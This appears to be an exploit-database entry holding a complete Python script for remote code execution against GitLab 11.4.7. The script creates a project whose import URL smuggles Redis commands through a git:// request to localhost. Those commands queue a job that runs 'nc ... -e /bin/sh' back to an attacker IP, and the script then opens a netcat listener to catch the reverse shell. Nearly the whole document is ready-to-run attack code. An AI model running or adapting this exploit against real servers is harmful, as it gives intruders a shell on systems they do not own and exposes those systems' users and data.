Gitlab 11.4.7 - Remote Code Execution

2020-12-19
ID: 103751
CVE: None
Download vulnerable application: None
# Exploit Title: 
# Date: 14-12-2020
# Exploit Author: Fortunato Lodari fox [at] thebrain [dot] net, foxlox
# Vendor Homepage: https://about.gitlab.com/
# POC: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/
# Tested On: Debian 10 + Apache/2.4.46 (Debian)
# Version: 11.4.7 community

import sys
import requests
import time
import random
import http.cookiejar
import os.path
from os import path

# Sign in GitLab 11.4.7  portal and get (using Burp or something other):
# authenticity_token
# authenticated cookies
# username
# specify localport and localip for reverse shell

username='aaaaaaaaaaaa'
authenticity_token='jpT/n1EoPwwWtiGu/+QKVQomofMNyqAQXY+iD2kVoRQoiQNzcFHPAj2+M4pyblKo/7UkClKW8jvp51Aw2qzs7g=='
cookie = '_gitlab_session=c942527505cc0580c026610a1799b811; sidebar_collapsed=false'
localport='1234'
localip='192.168.0.114'


url = "http://192.168.0.130:5080"
proxies = { "http": "http://localhost:8080" }


def deb(str):
    print("Debug => "+str)

def create_payload(authenticity_token,prgname,namespace_id,localip,localport,username):
    return {'utf8':'✓','authenticity_token':authenticity_token,'project[ci_cd_only]':'false','project[name]':prgname,'project[namespace_id]':namespace_id,'project[path]':prgname,'project[description]':prgname,'project[visibility_level]':'20','':'project[initialize_with_readme]','project[import_url]':'git://[0:0:0:0:0:ffff:127.0.0.1]:6379/\n multi\n sadd resque:gitlab:queues system_hook_push\n lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\'|nc '+localip+' '+localport+' -e /bin/sh\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"\n exec\n exec\n exec\n/'+username+'/'+prgname+'.git'}

import string
def random_string(length):
    return ''.join(random.choice(string.ascii_letters) for m in range(length))

def init(username,cookie,authenticity_token,localport,localip):
    from bs4 import BeautifulSoup
    import re
    import urllib.parse
    deb("Token: "+authenticity_token)
    deb("Cookie: "+cookie)
    session=requests.Session()
    headers = {'user-agent':'Moana Browser 1.0','Cookie':cookie,'Content-Type':'application/x-www-form-urlencoded','DNT':'1','Upgrade-Insecure-Requests':'1'}
    r=session.get(url+'/projects/new',headers=headers,allow_redirects=True)
    soup = BeautifulSoup(r.content,"lxml")
    nsid = soup.findAll('input', {"id": "project_namespace_id"})
    namespace_id=nsid[0]['value'];
    deb("Namespace ID: "+namespace_id)
    prgname=random_string(8)
    newpayload=create_payload(authenticity_token,prgname,namespace_id,localip,localport,username)
    newpayload=urllib.parse.urlencode(newpayload)
    deb("Payload encoded: "+newpayload)
    r=session.post(url+'/projects',newpayload,headers=headers,allow_redirects=False)
    os.system("nc -nvlp "+localport)

init(username,cookie,authenticity_token,localport,localip)
1-4-2 (www02)